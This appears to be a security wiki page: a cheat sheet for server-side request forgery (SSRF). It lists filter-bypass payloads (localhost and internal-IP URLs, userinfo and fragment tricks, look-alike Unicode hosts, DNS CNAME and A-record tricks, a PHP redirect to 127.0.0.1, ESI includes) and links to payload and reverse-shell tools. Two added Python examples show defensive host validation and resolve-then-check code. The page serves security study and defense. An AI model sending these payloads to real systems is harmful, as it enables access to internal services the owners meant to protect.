SSRF
What is it?
Exploitation
Bypass SSRF Protection using Domain CNAME A Record: https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-domain-cname-arecord.html
Bypass SSRF Protection using HTTP Redirect: https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-http-redirect.html
Payloads
SSRF Payloads for AWS: https://github.com/cybercdh/hacks/blob/master/ssrf_payloads/aws
Tools
Gopherus: https://github.com/tarunkant/Gopherus
This tool helps you generate Gopher payloads for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution). It also helps you get a reverse shell on the victim server.
Cheat Sheet
Basic Attack [ref1]
?url=http://localhost/server-status
?url=http://127.0.0.1/server-status
?url=http://internal_domain/page
?url=http://internal_ip(192.138.0.14)/page
Bypass SSRF with special char [ref1]
?url=http://allow_domain.internal_domain_or_ip/page
?url=http://allow_domain@internal_domain_or_ip/page
?url=http://internal_domain_or_ip#.allow_domain/page
?url=http://internal_domain_or_ip?.allow_domain/page
?url=http://internal_domain_or_ip\.allow_domain/page
?url=https://ⓦⓦⓦ.ⓗⓐⓗⓦⓤⓛ.ⓒⓞⓜ (equivalent to www.hahwul.com once the client normalizes the host name)
[ List ]
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
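Every payload in this section works because the filter looks at the raw URL string instead of the host an HTTP client actually connects to. The following Python example is added here (it is not from the cheat sheet or from hahwul) and contrasts a substring filter with an exact-match allow list on the parsed, IDNA-normalized host. The host names allowed.example.com and internal.local are placeholders.

```python
# Added example (not from the cheat sheet): a substring filter versus an
# exact-match allow list on the parsed, normalized host.
# allowed.example.com / internal.local are assumed placeholder names.
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"allowed.example.com"}


def naive_allows(url: str) -> bool:
    """The kind of check the bypasses above defeat: a substring test."""
    return "allowed.example.com" in url


def normalize_host(host: str) -> str:
    """Fold Unicode look-alikes (enclosed letters, full-width dots, ...) to the
    ASCII name the client will resolve, using Python's idna codec (NFKC + nameprep).
    Raises UnicodeError for labels that cannot be a DNS name."""
    return host.encode("idna").decode("ascii").lower()


def extract_host(url: str):
    """Return the normalized host a client would connect to, or None when the
    URL has no usable http(s) host. urlsplit strips userinfo ('user@'), the
    fragment ('#...') and the query ('?...') before .hostname is computed."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    try:
        return normalize_host(parts.hostname)
    except UnicodeError:
        return None


def strict_allows(url: str) -> bool:
    """Exact match on the parsed host; subdomain, userinfo, fragment and
    query tricks never reach the comparison."""
    host = extract_host(url)
    return host is not None and host in ALLOWED_HOSTS


# Constructed inputs mirroring the payload shapes listed in the cheat sheet.
PAYLOADS = [
    "http://allowed.example.com/page",                   # legitimate request
    "http://allowed.example.com.internal.local/page",    # allowed name as a leading label
    "http://allowed.example.com@internal.local/page",    # allowed name as userinfo
    "http://internal.local#.allowed.example.com/page",   # allowed name in the fragment
    "http://internal.local?.allowed.example.com/page",   # allowed name in the query
    "http://internal.local\\.allowed.example.com/page",  # backslash trick
]


def compare():
    """Map each payload to (naive verdict, strict verdict)."""
    return {u: (naive_allows(u), strict_allows(u)) for u in PAYLOADS}


if __name__ == "__main__":
    for url, (naive, strict) in compare().items():
        print(f"naive={naive!s:5} strict={strict!s:5} {url}")
    print(normalize_host("ⓦⓦⓦ.ⓗⓐⓗⓦⓤⓛ.ⓒⓞⓜ"))
```

Only the first payload passes the strict check; the other five pass the substring test and are rejected once the host is parsed out. The circled-letter host folds to www.hahwul.com because the idna codec applies NFKC, which is why a deny-list on the ASCII spelling is no protection. Normalize with the same rules as the HTTP client that will send the request (IDNA2003 and UTS #46 differ at the edges) and compare only after normalizing.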
Bypass SSRF Domain CNAME & A-Record [ref1]
[ CNAME ]
http://localhost.hahwul.com/server-status
$ nslookup localhost.hahwul.com
localhost.hahwul.com canonical name = localhost.
Name: localhost
Address: 127.0.0.1
[ A-Record ]
http://127.hahwul.com/server-status
Bypass SSRF HTTP Redirect [ref1]
?url=http://your-domain/r.php
[ r.php ]
<?php
header('Location: http://127.0.0.1:8080/server-status');
?>
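The CNAME and A-record tricks above defeat checks on the name, and r.php defeats checks on the first URL only. Resolving the name first, rejecting any non-public answer, pinning the connection to the checked address and re-validating every redirect instead of letting the client follow it closes all three. This Python example is added here (it is not from the cheat sheet or from hahwul); the resolver and fetcher are injected so it runs offline on constructed DNS answers, and your-domain.example, attacker.example and 1.2.3.4 are made-up values.

```python
# Added example (not from the cheat sheet): resolve-then-check with address
# pinning, plus manual redirect re-validation. DNS answers and HTTP responses
# below are constructed test doubles; the names and 1.2.3.4 are assumptions.
import ipaddress
import socket
from urllib.parse import urlsplit


class BlockedURL(Exception):
    pass


def system_resolve(host):
    """Default resolver: every A/AAAA answer for the host."""
    return {ai[4][0] for ai in socket.getaddrinfo(host, None)}


def is_public(ip_text):
    """True only for globally routable unicast. IPv4-mapped IPv6
    (::ffff:127.0.0.1) is unwrapped so it cannot smuggle loopback through."""
    ip = ipaddress.ip_address(ip_text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def check_target(url, resolve=system_resolve):
    """Parse and resolve; return (host, port, ip) the client must connect to.
    Raises BlockedURL if any answer is non-public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise BlockedURL(f"unsupported URL: {url!r}")
    try:
        host = parts.hostname.encode("idna").decode("ascii")
    except UnicodeError as e:
        raise BlockedURL(f"bad host name: {e}")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        answers = {str(ipaddress.ip_address(host))}  # IP literal: no lookup
    except ValueError:
        answers = resolve(host)
    if not answers:
        raise BlockedURL(f"no address for {host}")
    # Every answer must be public: a name that points at 127.0.0.1 through a
    # CNAME to localhost. or a plain A record is rejected here.
    bad = sorted(a for a in answers if not is_public(a))
    if bad:
        raise BlockedURL(f"{host} points at non-public {bad}")
    return host, port, sorted(answers)[0]


def safe_fetch(url, fetch, resolve=system_resolve, max_redirects=3):
    """Fetch with the client's own redirect following disabled.
    fetch(url, ip) -> (status, headers, body) and must connect to ip."""
    for _ in range(max_redirects + 1):
        host, port, ip = check_target(url, resolve)
        status, headers, body = fetch(url, ip)
        if status not in (301, 302, 303, 307, 308):
            return status, body
        url = headers.get("Location", "")  # re-validated on the next turn
    raise BlockedURL("too many redirects")


# --- constructed test doubles mirroring the cheat sheet's bypasses ---
FAKE_DNS = {
    "your-domain.example": {"1.2.3.4"},              # ordinary public host
    "localhost.attacker.example": {"127.0.0.1"},     # CNAME -> localhost.
    "127.attacker.example": {"127.0.0.1"},           # A record -> 127.0.0.1
    "mapped.attacker.example": {"::ffff:127.0.0.1"}, # IPv4-mapped loopback
}


def fake_resolve(host):
    return FAKE_DNS.get(host, set())


def fake_fetch(url, ip):
    """Stands in for the network: /r.php answers like the r.php above."""
    if url == "http://your-domain.example/r.php":
        return 302, {"Location": "http://127.0.0.1:8080/server-status"}, b""
    return 200, {}, b"ok"


def demo():
    """Outcome per URL: the HTTP status, or a 'blocked: ...' reason."""
    results = {}
    for url in ("http://your-domain.example/page",
                "http://your-domain.example/r.php",
                "http://localhost.attacker.example/server-status",
                "http://127.attacker.example/server-status",
                "http://mapped.attacker.example/"):
        try:
            results[url] = safe_fetch(url, fake_fetch, fake_resolve)[0]
        except BlockedURL as e:
            results[url] = f"blocked: {e}"
    return results


if __name__ == "__main__":
    for url, outcome in demo().items():
        print(outcome, url)
```

Only the plain page request returns 200; the redirect is stopped when the Location header is checked and the three loopback names are stopped at resolution. The fetcher must connect to the address check_target returned rather than resolve the name again, otherwise a second lookup can get a different answer (DNS rebinding); with most HTTP libraries that means a custom connection adapter or a resolve override.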
SSRF with ESI [ref1]
<esi:include src="http://127.0.0.1/server-status"/>
<esi:include src="http://internal_domain/server_base_csrf_page"/>
Other Resources
Hahwul's SSRF cheatsheet: https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1
This script takes a domain name and a callback server, parses links, appends SSRF parameters and fires the requests. https://gist.github.com/hussein98d/d09b5990ff339dac8029b1e9248d2875
References
[ref1] : https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1